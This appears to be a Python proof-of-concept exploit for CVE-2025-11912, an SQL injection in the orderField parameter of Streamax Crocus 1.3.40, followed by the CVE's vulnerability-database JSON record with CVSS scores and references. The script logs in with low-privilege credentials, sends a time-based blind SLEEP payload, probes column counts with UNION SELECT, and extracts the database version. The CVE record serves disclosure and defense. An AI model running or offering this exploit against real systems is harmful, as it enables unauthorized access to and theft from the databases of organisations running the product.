CVE-2025-11912

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2025-11912 - Streamax Crocus SQL Injection PoC Vulnerable endpoint: /DeviceState.do?Action=Query Vulnerable parameter: orderField Author: Security Researcher """ import requests import sys import urllib.parse TARGET_URL = "http://target:8080" USERNAME = "low_priv_user" PASSWORD = "password123" def login(session, base_url): """Login to obtain session cookie""" login_url = f"{base_url}/Login.do?Action=Login" data = { "userName": USERNAME, "password": PASSWORD } resp = session.post(login_url, data=data, timeout=10) return resp.status_code == 200 def exploit_sqli(session, base_url): """Exploit SQL injection in orderField parameter""" # Time-based blind SQL injection payload payload = "id;SELECT SLEEP(5)-- " encoded_payload = urllib.parse.quote(payload) target_url = f"{base_url}/DeviceState.do?Action=Query&orderField={encoded_payload}" try: resp = session.get(target_url, timeout=15) print(f"[+] Response status: {resp.status_code}") print(f"[+] Response length: {len(resp.text)}") print(f"[+] Response preview: {resp.text[:500]}") return resp except requests.exceptions.Timeout: print("[+] Timeout detected - SQL injection confirmed (time-based)") return None except Exception as e: print(f"[-] Error: {e}") return None def union_injection(session, base_url): """UNION-based SQL injection to extract data""" # Determine number of columns first payloads = [ "id UNION SELECT 1-- ", "id UNION SELECT 1,2-- ", "id UNION SELECT 1,2,3-- ", "id UNION SELECT 1,2,3,4-- ", "id UNION SELECT 1,2,3,4,5-- ", ] for payload in payloads: encoded = urllib.parse.quote(payload) url = f"{base_url}/DeviceState.do?Action=Query&orderField={encoded}" resp = session.get(url, timeout=10) if resp.status_code == 200 and "error" not in resp.text.lower(): print(f"[+] Valid column count with payload: {payload}") # Extract database version version_payload = payload.replace("-- ", "") + ",version()-- " encoded_v = urllib.parse.quote(version_payload) url_v = f"{base_url}/DeviceState.do?Action=Query&orderField={encoded_v}" resp_v = session.get(url_v, timeout=10) print(f"[+] DB version info: {resp_v.text[:300]}") break def main(): session = requests.Session() session.headers.update({ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" }) print(f"[*] Target: {TARGET_URL}") print("[*] Attempting login...") if login(session, TARGET_URL): print("[+] Login successful") print("[*] Testing SQL injection...") exploit_sqli(session, TARGET_URL) print("[*] Attempting UNION injection...") union_injection(session, TARGET_URL) else: print("[-] Login failed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11912", "sourceIdentifier": "[email protected]", "published": "2025-10-17T20:15:37.407", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Shenzhen Ruiming Technology Streamax Crocus 1.3.40. Affected is the function Query of the file /DeviceState.do?Action=Query. This manipulation of the argument orderField causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:streamax:streamax_crocus:1.3.40:*:*:*:*:*:*:*", "matchCriteriaId": "9BE97623-A1D4-407D-88A8-8E204CFC39D2"}]}]}], "references": [{"url": "https://github.com/FightingLzn9/vul/blob/main/%E6%B7%B1%E5%9C%B3%E5%B8%82%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AF%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8Crocus%E7%B3%BB%E7%BB%9F-5.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328922", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328922", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671455", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}